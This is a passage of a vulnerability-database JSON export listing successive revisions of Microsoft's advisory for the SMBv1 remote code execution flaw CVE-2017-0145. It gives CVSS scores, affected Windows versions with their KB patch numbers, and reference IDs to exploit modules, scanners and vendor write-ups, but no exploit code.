"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB4014077", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": 
"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems 
Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 
for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "32dd1c2d5f94ad64bc33322ba051cb15", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": 
"openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 
3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 
8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 